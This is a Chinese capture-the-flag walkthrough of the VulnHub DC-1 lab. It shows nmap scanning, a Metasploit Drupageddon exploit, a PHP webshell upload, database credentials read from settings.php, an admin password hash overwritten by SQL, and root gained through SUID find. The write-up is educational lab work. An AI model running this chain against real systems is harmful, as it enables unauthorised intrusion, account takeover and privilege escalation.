渗透环境:DC1
攻击机:192.168.138.128
靶机:ip地址未知, 已知ip与攻击机在同一网段下

环境搭建

靶机环境:https://www.vulnhub.com/entry/dc-1,292/

信息收集

使用nmap扫描存活的主机

1
nmap  -sP 192.168.138.0/24

img

192.168.178.129:目标主机

扫描目标主机对外开放的端口

1
namp -sS -p- 192.168.178.129

img

发现开启了端口80
浏览192.168.178.129:80

img

查看Wappalyzer

img

发现cms为Drupal,这版本有点low,估计有漏洞

渗透过程

flag1

使用msf

1
search drupal

img

这里我们选择exploit/multi/http/drupal_drupageddon

1
2
3
4
use 2
options//查看需要设置的参数
set RHOSTS 192.168.178.129//设置目标ip
run

成功后我们执行ls,查看当前目录

img

发现flag1.txt,打开查看

1
cat flag1.txt

img

flag2

到这里,上传个一句话木马看看

1
upload /data/shell.php

用蚁剑进行连接

img

找找第二个flag在哪
最后发现在settings.php中

img

flag3

里面还有数据库的账号密码,也发现是mysql
在msf上传个交互shell, 然后连接mysql

1
2
3
4
shell
python -c 'import pty; pty.spawn("/bin/bash")'
mysql -u dbuser -p 
R0ck3t

然后就常规的,查库,查表,查列,爆内容

1
2
3
4
show databases; 
use drupaldb; 
show tables; 
select * from users;

img

这里admin的密码被加密了,我们选择update的方式改为我们知道的密码
其中drupal可以通过password-hash.sh生成新的密码
我们在www目录执行

1
php scripts/password-hash.sh admin

img

sql中的替换语句

1
update users set pass='$S$DtPgSa61SbR1DXIh4wWcMft/rOmsKXcgvxTUAgenIMRbH65ZUAZu' where name='admin';

用账号:admin 密码:admin ,登录192.168.178.129:80查看里面信息

img

flag4

在home目录下发现flag4.txt

img

flag5

所以我们要提权到root,这里我们用find提权

1
find / -perm -u=s -type f 2>/dev/null

img

发现find能利用
在/tmp目录下创建command文件

1
2
touch command
find command -exec whoami \;

img

发现获得root权限了
修改命令

1
2
find command -exec ls /root \; 
find command -exec cat /root/thefinalflag.txt \;

img

到处为止DC-1完成